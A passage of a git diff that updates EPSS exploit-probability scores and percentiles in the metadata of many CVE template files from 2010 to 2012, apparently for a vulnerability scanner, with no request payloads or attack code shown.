a/http/cves/2010/CVE-2010-2036.yaml b/http/cves/2010/CVE-2010-2036.yaml index 0789ec5658..aa29dab822 100644 --- a/http/cves/2010/CVE-2010-2036.yaml +++ b/http/cves/2010/CVE-2010-2036.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2036 cwe-id: CWE-22 epss-score: 0.00718 - epss-percentile: 0.78113 + epss-percentile: 0.78338 cpe: cpe:2.3:a:percha:com_perchafieldsattach:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2037.yaml b/http/cves/2010/CVE-2010-2037.yaml index a6a87d6481..dd09efc4b3 100644 --- a/http/cves/2010/CVE-2010-2037.yaml +++ b/http/cves/2010/CVE-2010-2037.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2037 cwe-id: CWE-22 epss-score: 0.00718 - epss-percentile: 0.78113 + epss-percentile: 0.78338 cpe: cpe:2.3:a:percha:com_perchadownloadsattach:1.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2045.yaml b/http/cves/2010/CVE-2010-2045.yaml index 386617fa95..d9c4cf12f4 100644 --- a/http/cves/2010/CVE-2010-2045.yaml +++ b/http/cves/2010/CVE-2010-2045.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2045 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.86069 + epss-percentile: 0.86192 cpe: cpe:2.3:a:dionesoft:com_dioneformwizard:1.0.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2050.yaml b/http/cves/2010/CVE-2010-2050.yaml index 9d90510fc8..8b1caa457c 100644 --- a/http/cves/2010/CVE-2010-2050.yaml +++ b/http/cves/2010/CVE-2010-2050.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-2050 cwe-id: CWE-22 epss-score: 0.03527 - epss-percentile: 0.90353 + epss-percentile: 0.90469 cpe: cpe:2.3:a:m0r0n:com_mscomment:0.8.0:b:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2122.yaml b/http/cves/2010/CVE-2010-2122.yaml index 95e9e13594..dab52f5f35 100644 --- a/http/cves/2010/CVE-2010-2122.yaml +++ b/http/cves/2010/CVE-2010-2122.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-2122 cwe-id: CWE-22 epss-score: 0.01806 - epss-percentile: 0.86643 + epss-percentile: 0.86767 cpe: cpe:2.3:a:joelrowley:com_simpledownload:0.9.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2128.yaml b/http/cves/2010/CVE-2010-2128.yaml index 0b9e6a917b..168cfcd67a 100644 --- a/http/cves/2010/CVE-2010-2128.yaml +++ b/http/cves/2010/CVE-2010-2128.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2128 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83796 + epss-percentile: 0.83956 cpe: cpe:2.3:a:harmistechnology:com_jequoteform:1.0:b1:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2259.yaml b/http/cves/2010/CVE-2010-2259.yaml index fc01ea65b1..369822d74d 100644 --- a/http/cves/2010/CVE-2010-2259.yaml +++ b/http/cves/2010/CVE-2010-2259.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2259 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.86069 + epss-percentile: 0.86192 cpe: cpe:2.3:a:tamlyncreative:com_bfsurvey_profree:1.2.6:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2307.yaml b/http/cves/2010/CVE-2010-2307.yaml index 462c397774..56763ed654 100644 --- a/http/cves/2010/CVE-2010-2307.yaml +++ b/http/cves/2010/CVE-2010-2307.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2307 cwe-id: CWE-22 epss-score: 0.00832 - epss-percentile: 0.7986 + epss-percentile: 0.80081 cpe: cpe:2.3:h:motorola:surfboard_sbv6120e:sbv6x2x-1.0.0.5-scm-02-shpc:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2507.yaml b/http/cves/2010/CVE-2010-2507.yaml index 6474e0f8ec..867a4d4321 100644 --- a/http/cves/2010/CVE-2010-2507.yaml +++ b/http/cves/2010/CVE-2010-2507.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2507 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.86069 + epss-percentile: 0.86192 cpe: cpe:2.3:a:masselink:com_picasa2gallery:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2680.yaml b/http/cves/2010/CVE-2010-2680.yaml index 324361d394..5fd8325f15 100644 --- a/http/cves/2010/CVE-2010-2680.yaml +++ b/http/cves/2010/CVE-2010-2680.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2680 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.79783 + epss-percentile: 0.80013 cpe: cpe:2.3:a:harmistechnology:com_jesectionfinder:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2682.yaml b/http/cves/2010/CVE-2010-2682.yaml index 262d95e344..40eb5eac25 100644 --- a/http/cves/2010/CVE-2010-2682.yaml +++ b/http/cves/2010/CVE-2010-2682.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-2682 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.79783 + epss-percentile: 0.80013 cpe: cpe:2.3:a:realtyna:com_realtyna:1.0.15:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2857.yaml b/http/cves/2010/CVE-2010-2857.yaml index d750cd5c80..fbb7edd1ab 100644 --- a/http/cves/2010/CVE-2010-2857.yaml +++ b/http/cves/2010/CVE-2010-2857.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2857 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.79783 + epss-percentile: 0.80013 cpe: cpe:2.3:a:danieljamesscott:com_music:0.1:-:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2861.yaml b/http/cves/2010/CVE-2010-2861.yaml index cf8ddad9ab..689ff60b3e 100644 --- a/http/cves/2010/CVE-2010-2861.yaml +++ b/http/cves/2010/CVE-2010-2861.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2010-2861 cwe-id: CWE-22 - epss-score: 0.97321 - epss-percentile: 0.99812 + epss-score: 0.97351 + epss-percentile: 0.99855 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2918.yaml b/http/cves/2010/CVE-2010-2918.yaml index 96cd1d53d3..45fb71011f 100644 --- a/http/cves/2010/CVE-2010-2918.yaml +++ b/http/cves/2010/CVE-2010-2918.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-2918 cwe-id: CWE-94 epss-score: 0.02847 - epss-percentile: 0.89382 + epss-percentile: 0.89537 cpe: cpe:2.3:a:visocrea:com_joomla_visites:1.1:rc2:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2920.yaml b/http/cves/2010/CVE-2010-2920.yaml index 96f32823d8..071411b9f6 100644 --- a/http/cves/2010/CVE-2010-2920.yaml +++ b/http/cves/2010/CVE-2010-2920.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2920 cwe-id: CWE-22 epss-score: 0.03527 - epss-percentile: 0.90353 + epss-percentile: 0.90469 cpe: cpe:2.3:a:foobla:com_foobla_suggestions:1.5.1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-3203.yaml b/http/cves/2010/CVE-2010-3203.yaml index 9be091cbe4..6c52c330c5 100644 --- a/http/cves/2010/CVE-2010-3203.yaml +++ b/http/cves/2010/CVE-2010-3203.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-3203 cwe-id: CWE-22 epss-score: 0.00626 - epss-percentile: 0.76317 + epss-percentile: 0.76577 cpe: cpe:2.3:a:xmlswf:com_picsell:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-3426.yaml b/http/cves/2010/CVE-2010-3426.yaml index 3c38addf26..8fc96523d4 100644 --- a/http/cves/2010/CVE-2010-3426.yaml +++ b/http/cves/2010/CVE-2010-3426.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-3426 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.79783 + epss-percentile: 0.80013 cpe: cpe:2.3:a:4you-studio:com_jphone:1.0:alpha3:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-4231.yaml b/http/cves/2010/CVE-2010-4231.yaml index 9f54a500c0..b02c676a78 100644 --- a/http/cves/2010/CVE-2010-4231.yaml +++ b/http/cves/2010/CVE-2010-4231.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-4231 cwe-id: CWE-22 epss-score: 0.01615 - epss-percentile: 0.85862 + epss-percentile: 0.86005 cpe: cpe:2.3:a:camtron:cmnc-200_firmware:1.102a-008:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-4239.yaml b/http/cves/2010/CVE-2010-4239.yaml index ee437547ef..013cc1c2fa 100644 --- a/http/cves/2010/CVE-2010-4239.yaml +++ b/http/cves/2010/CVE-2010-4239.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2010-4239 cwe-id: CWE-20 - epss-score: 0.02543 - epss-percentile: 0.88814 + epss-score: 0.03561 + epss-percentile: 0.90504 cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:5.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-4282.yaml b/http/cves/2010/CVE-2010-4282.yaml index a4e9d21c96..48aa47f1f9 100644 --- a/http/cves/2010/CVE-2010-4282.yaml +++ b/http/cves/2010/CVE-2010-4282.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-4282 cwe-id: CWE-22 epss-score: 0.01214 - epss-percentile: 0.83541 + epss-percentile: 0.83719 cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-4617.yaml b/http/cves/2010/CVE-2010-4617.yaml index 75c9e2387b..8b1ef9c043 100644 --- a/http/cves/2010/CVE-2010-4617.yaml +++ b/http/cves/2010/CVE-2010-4617.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.8 cve-id: CVE-2010-4617 cwe-id: CWE-22 - epss-score: 0.00938 - epss-percentile: 0.81097 + epss-score: 0.00826 + epss-percentile: 0.80013 cpe: cpe:2.3:a:kanich:com_jotloader:2.2.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-4719.yaml b/http/cves/2010/CVE-2010-4719.yaml index 28f82304dc..0a43d5e042 100644 --- a/http/cves/2010/CVE-2010-4719.yaml +++ b/http/cves/2010/CVE-2010-4719.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-4719 cwe-id: CWE-22 epss-score: 0.04503 - epss-percentile: 0.91406 + epss-percentile: 0.91517 cpe: cpe:2.3:a:fxwebdesign:com_jradio:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-4769.yaml b/http/cves/2010/CVE-2010-4769.yaml index 14f22c3079..64a2f0b800 100644 --- a/http/cves/2010/CVE-2010-4769.yaml +++ b/http/cves/2010/CVE-2010-4769.yaml @@ -14,8 +14,8 @@ info: cvss-score: 7.5 cve-id: CVE-2010-4769 cwe-id: CWE-22 - epss-score: 0.00949 - epss-percentile: 0.81213 + epss-score: 0.00938 + epss-percentile: 0.8131 cpe: cpe:2.3:a:janguo:com_jimtawl:1.0.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-4977.yaml b/http/cves/2010/CVE-2010-4977.yaml index ad78593d78..f9a5fb2d24 100644 --- a/http/cves/2010/CVE-2010-4977.yaml +++ b/http/cves/2010/CVE-2010-4977.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2010-4977 cwe-id: CWE-89 - epss-score: 0.00199 - epss-percentile: 0.57091 + epss-score: 0.002 + epss-percentile: 0.57508 cpe: cpe:2.3:a:miniwork:com_canteen:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-5028.yaml b/http/cves/2010/CVE-2010-5028.yaml index eea4df86bd..49d1032bd4 100644 --- a/http/cves/2010/CVE-2010-5028.yaml +++ b/http/cves/2010/CVE-2010-5028.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2010-5028 cwe-id: CWE-89 - epss-score: 0.01052 - epss-percentile: 0.82203 + epss-score: 0.0136 + epss-percentile: 0.84701 cpe: cpe:2.3:a:harmistechnology:com_jejob:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-5278.yaml b/http/cves/2010/CVE-2010-5278.yaml index 2b51c75d92..c8dfc6f272 100644 --- a/http/cves/2010/CVE-2010-5278.yaml +++ b/http/cves/2010/CVE-2010-5278.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-5278 cwe-id: CWE-22 epss-score: 0.04725 - epss-percentile: 0.91601 + epss-percentile: 0.91722 cpe: cpe:2.3:a:modx:modx_revolution:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-5286.yaml b/http/cves/2010/CVE-2010-5286.yaml index 7d26a64bca..ca48770777 100644 --- a/http/cves/2010/CVE-2010-5286.yaml +++ b/http/cves/2010/CVE-2010-5286.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-5286 cwe-id: CWE-22 epss-score: 0.04708 - epss-percentile: 0.9159 + epss-percentile: 0.91709 cpe: cpe:2.3:a:joobi:com_jstore:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-0049.yaml b/http/cves/2011/CVE-2011-0049.yaml index 1cf893689a..f0772a48b2 100644 --- a/http/cves/2011/CVE-2011-0049.yaml +++ b/http/cves/2011/CVE-2011-0049.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2011-0049 cwe-id: CWE-22 epss-score: 0.96615 - epss-percentile: 0.99457 + epss-percentile: 0.99489 cpe: cpe:2.3:a:mj2:majordomo_2:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-1669.yaml b/http/cves/2011/CVE-2011-1669.yaml index 5595d42765..33d302088a 100644 --- a/http/cves/2011/CVE-2011-1669.yaml +++ b/http/cves/2011/CVE-2011-1669.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2011-1669 cwe-id: CWE-22 epss-score: 0.02966 - epss-percentile: 0.89572 + epss-percentile: 0.89721 cpe: cpe:2.3:a:mikoviny:wp_custom_pages:0.5.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-2744.yaml b/http/cves/2011/CVE-2011-2744.yaml index 3fb06048f0..d8a231a19d 100644 --- a/http/cves/2011/CVE-2011-2744.yaml +++ b/http/cves/2011/CVE-2011-2744.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2011-2744 cwe-id: CWE-22 epss-score: 0.01541 - epss-percentile: 0.85494 + epss-percentile: 0.85644 cpe: cpe:2.3:a:chyrp:chyrp:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-2780.yaml b/http/cves/2011/CVE-2011-2780.yaml index 6cf391a790..7a940bd1dd 100644 --- a/http/cves/2011/CVE-2011-2780.yaml +++ b/http/cves/2011/CVE-2011-2780.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2011-2780 cwe-id: CWE-22 epss-score: 0.03327 - epss-percentile: 0.90099 + epss-percentile: 0.90232 cpe: cpe:2.3:a:chyrp:chyrp:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-3315.yaml b/http/cves/2011/CVE-2011-3315.yaml index a9be84307a..c48e7cf718 100644 --- a/http/cves/2011/CVE-2011-3315.yaml +++ b/http/cves/2011/CVE-2011-3315.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2011-3315 cwe-id: CWE-22 epss-score: 0.90502 - epss-percentile: 0.98414 + epss-percentile: 0.98458 cpe: cpe:2.3:h:cisco:unified_ip_interactive_voice_response:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-4336.yaml b/http/cves/2011/CVE-2011-4336.yaml index 2386f992e0..c7ebe8beb9 100644 --- a/http/cves/2011/CVE-2011-4336.yaml +++ b/http/cves/2011/CVE-2011-4336.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2011-4336 cwe-id: CWE-79 epss-score: 0.00182 - epss-percentile: 0.54818 + epss-percentile: 0.55242 cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-4618.yaml b/http/cves/2011/CVE-2011-4618.yaml index 446f0cfe98..a03e53decc 100644 --- a/http/cves/2011/CVE-2011-4618.yaml +++ b/http/cves/2011/CVE-2011-4618.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2011-4618 cwe-id: CWE-79 epss-score: 0.00746 - epss-percentile: 0.78598 + epss-percentile: 0.78815 cpe: cpe:2.3:a:simplerealtytheme:advanced_text_widget_plugin:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2011/CVE-2011-4624.yaml b/http/cves/2011/CVE-2011-4624.yaml index 29a2aa9f8c..90161fc2ce 100644 --- a/http/cves/2011/CVE-2011-4624.yaml +++ b/http/cves/2011/CVE-2011-4624.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2011-4624 cwe-id: CWE-79 epss-score: 0.00301 - epss-percentile: 0.65663 + epss-percentile: 0.66017 cpe: cpe:2.3:a:codeasily:grand_flagallery:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-4804.yaml b/http/cves/2011/CVE-2011-4804.yaml index 22b9d25e63..29ef34c10f 100644 --- a/http/cves/2011/CVE-2011-4804.yaml +++ b/http/cves/2011/CVE-2011-4804.yaml @@ -15,8 +15,8 @@ info: cvss-score: 5 cve-id: CVE-2011-4804 cwe-id: CWE-22 - epss-score: 0.06953 - epss-percentile: 0.93063 + epss-score: 0.0358 + epss-percentile: 0.90533 cpe: cpe:2.3:a:foobla:com_obsuggest:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-4926.yaml b/http/cves/2011/CVE-2011-4926.yaml index 5e7c30dce0..527950187f 100644 --- a/http/cves/2011/CVE-2011-4926.yaml +++ b/http/cves/2011/CVE-2011-4926.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2011-4926 cwe-id: CWE-79 epss-score: 0.01001 - epss-percentile: 0.8173 + epss-percentile: 0.8193 cpe: cpe:2.3:a:bueltge:adminimize:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-5106.yaml b/http/cves/2011/CVE-2011-5106.yaml index 742dd8123d..12c855c62f 100644 --- a/http/cves/2011/CVE-2011-5106.yaml +++ b/http/cves/2011/CVE-2011-5106.yaml @@ -18,8 +18,8 @@ info: cvss-score: 4.3 cve-id: CVE-2011-5106 cwe-id: CWE-79 - epss-score: 0.00541 - epss-percentile: 0.7437 + epss-score: 0.00434 + epss-percentile: 0.71729 cpe: cpe:2.3:a:fractalia:flexible_custom_post_type:0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-5107.yaml b/http/cves/2011/CVE-2011-5107.yaml index 8b93edda3b..725bb75d4f 100644 --- a/http/cves/2011/CVE-2011-5107.yaml +++ b/http/cves/2011/CVE-2011-5107.yaml @@ -15,8 +15,8 @@ info: cvss-score: 4.3 cve-id: CVE-2011-5107 cwe-id: CWE-79 - epss-score: 0.0022 - epss-percentile: 0.59193 + epss-score: 0.00214 + epss-percentile: 0.59127 cpe: cpe:2.3:a:wordpress:alert_before_you_post:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-5179.yaml b/http/cves/2011/CVE-2011-5179.yaml index f57c5b7698..847fcff203 100644 --- a/http/cves/2011/CVE-2011-5179.yaml +++ b/http/cves/2011/CVE-2011-5179.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2011-5179 cwe-id: CWE-79 epss-score: 0.0022 - epss-percentile: 0.59193 + epss-percentile: 0.59588 cpe: cpe:2.3:a:skysa:skysa_app_bar_integration_plugin:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-5181.yaml b/http/cves/2011/CVE-2011-5181.yaml index 917c82bd28..cc3ef4d4c1 100644 --- a/http/cves/2011/CVE-2011-5181.yaml +++ b/http/cves/2011/CVE-2011-5181.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2011-5181 cwe-id: CWE-79 epss-score: 0.00326 - epss-percentile: 0.67061 + epss-percentile: 0.67415 cpe: cpe:2.3:a:clickdesk:clickdesk_live_support-live_chat_plugin:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-5252.yaml b/http/cves/2011/CVE-2011-5252.yaml index 42a43d48cf..f9acd10846 100644 --- a/http/cves/2011/CVE-2011-5252.yaml +++ b/http/cves/2011/CVE-2011-5252.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2011-5252 cwe-id: CWE-20 epss-score: 0.02747 - epss-percentile: 0.8922 + epss-percentile: 0.89378 cpe: cpe:2.3:a:orchardproject:orchard:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-5265.yaml b/http/cves/2011/CVE-2011-5265.yaml index 3e404ca69e..f05e55a2bc 100644 --- a/http/cves/2011/CVE-2011-5265.yaml +++ b/http/cves/2011/CVE-2011-5265.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2011-5265 cwe-id: CWE-79 epss-score: 0.00432 - epss-percentile: 0.71357 + epss-percentile: 0.71657 cpe: cpe:2.3:a:featurific_for_wordpress_project:featurific-for-wordpress:1.6.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-0392.yaml b/http/cves/2012/CVE-2012-0392.yaml index 6e96f6924b..c3150e4226 100644 --- a/http/cves/2012/CVE-2012-0392.yaml +++ b/http/cves/2012/CVE-2012-0392.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2012-0392 cwe-id: NVD-CWE-noinfo epss-score: 0.97059 - epss-percentile: 0.99651 + epss-percentile: 0.99675 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-0394.yaml b/http/cves/2012/CVE-2012-0394.yaml index 6a669559e5..922c04ff25 100644 --- a/http/cves/2012/CVE-2012-0394.yaml +++ b/http/cves/2012/CVE-2012-0394.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.8 cve-id: CVE-2012-0394 cwe-id: CWE-94 - epss-score: 0.953 - epss-percentile: 0.99071 + epss-score: 0.95611 + epss-percentile: 0.9919 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2012/CVE-2012-0896.yaml b/http/cves/2012/CVE-2012-0896.yaml index ec829749af..22e402f493 100644 --- a/http/cves/2012/CVE-2012-0896.yaml +++ b/http/cves/2012/CVE-2012-0896.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2012-0896 cwe-id: CWE-22 epss-score: 0.02262 - epss-percentile: 0.88176 + epss-percentile: 0.8834 cpe: cpe:2.3:a:count_per_day_project:count_per_day:2.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-0901.yaml b/http/cves/2012/CVE-2012-0901.yaml index 0e2e728709..ed9eba9f3e 100644 --- a/http/cves/2012/CVE-2012-0901.yaml +++ b/http/cves/2012/CVE-2012-0901.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2012-0901 cwe-id: CWE-79 epss-score: 0.00216 - epss-percentile: 0.58864 + epss-percentile: 0.59256 cpe: cpe:2.3:a:attenzione:yousaytoo:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-0981.yaml b/http/cves/2012/CVE-2012-0981.yaml index b33ab3000b..ce21b20a31 100644 --- a/http/cves/2012/CVE-2012-0981.yaml +++ b/http/cves/2012/CVE-2012-0981.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5 cve-id: CVE-2012-0981 cwe-id: CWE-22 - epss-score: 0.05654 - epss-percentile: 0.92327 + epss-score: 0.04065 + epss-percentile: 0.91092 cpe: cpe:2.3:a:kybernetika:phpshowtime:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-0991.yaml b/http/cves/2012/CVE-2012-0991.yaml index 44d840b3f6..d922679bec 100644 --- a/http/cves/2012/CVE-2012-0991.yaml +++ b/http/cves/2012/CVE-2012-0991.yaml @@ -17,8 +17,8 @@ info: cvss-score: 3.5 cve-id: CVE-2012-0991 cwe-id: CWE-22 - epss-score: 0.89208 - epss-percentile: 0.98307 + epss-score: 0.8848 + epss-percentile: 0.9833 cpe: cpe:2.3:a:openemr:openemr:4.1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-0996.yaml b/http/cves/2012/CVE-2012-0996.yaml index 1134d23017..d350b5cfea 100644 --- a/http/cves/2012/CVE-2012-0996.yaml +++ b/http/cves/2012/CVE-2012-0996.yaml @@ -15,8 +15,8 @@ info: cvss-score: 5 cve-id: CVE-2012-0996 cwe-id: CWE-22 - epss-score: 0.01398 - epss-percentile: 0.84741 + epss-score: 0.01048 + epss-percentile: 0.8234 cpe: cpe:2.3:a:11in1:11in1:1.2.1:stable_12-31-2011:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-1226.yaml b/http/cves/2012/CVE-2012-1226.yaml index 76416fd698..91b4f21dd1 100644 --- a/http/cves/2012/CVE-2012-1226.yaml +++ b/http/cves/2012/CVE-2012-1226.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2012-1226 cwe-id: CWE-22 epss-score: 0.10469 - epss-percentile: 0.94257 + epss-percentile: 0.94354 cpe: cpe:2.3:a:dolibarr:dolibarr_erp\/crm:3.2.0:alpha:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-1823.yaml b/http/cves/2012/CVE-2012-1823.yaml index 8393c0b888..19fa52a34e 100644 --- a/http/cves/2012/CVE-2012-1823.yaml +++ b/http/cves/2012/CVE-2012-1823.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2012-1823 cwe-id: CWE-20 - epss-score: 0.97494 - epss-percentile: 0.99959 + epss-score: 0.97491 + epss-percentile: 0.99967 cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-1835.yaml b/http/cves/2012/CVE-2012-1835.yaml index ae574af284..02c5ec68d3 100644 --- a/http/cves/2012/CVE-2012-1835.yaml +++ b/http/cves/2012/CVE-2012-1835.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2012-1835 cwe-id: CWE-79 epss-score: 0.00229 - epss-percentile: 0.60385 + epss-percentile: 0.60781 cpe: cpe:2.3:a:timely:all-in-one_event_calendar:1.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-2371.yaml b/http/cves/2012/CVE-2012-2371.yaml index 750de02ed3..cb7873111a 100644 --- a/http/cves/2012/CVE-2012-2371.yaml +++ b/http/cves/2012/CVE-2012-2371.yaml @@ -18,8 +18,8 @@ info: cvss-score: 4.3 cve-id: CVE-2012-2371 cwe-id: CWE-79 - epss-score: 0.00857 - epss-percentile: 0.80154 + epss-score: 0.00605 + epss-percentile: 0.7612 cpe: cpe:2.3:a:mnt-tech:wp-facethumb:0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-3153.yaml b/http/cves/2012/CVE-2012-3153.yaml index 68d545a05d..794f1825a1 100644 --- a/http/cves/2012/CVE-2012-3153.yaml +++ b/http/cves/2012/CVE-2012-3153.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2012-3153 cwe-id: NVD-CWE-noinfo epss-score: 0.97048 - epss-percentile: 0.99647 + epss-percentile: 0.99668 cpe: cpe:2.3:a:oracle:fusion_middleware:11.1.1.4.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2012/CVE-2012-4032.yaml b/http/cves/2012/CVE-2012-4032.yaml index c62d9ecca4..8846e48248 100644 --- a/http/cves/2012/CVE-2012-4032.yaml +++ b/http/cves/2012/CVE-2012-4032.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.8 cve-id: CVE-2012-4032 cwe-id: CWE-20 - epss-score: 0.01204 - epss-percentile: 0.83485 + epss-score: 0.00951 + epss-percentile: 0.81437 cpe: 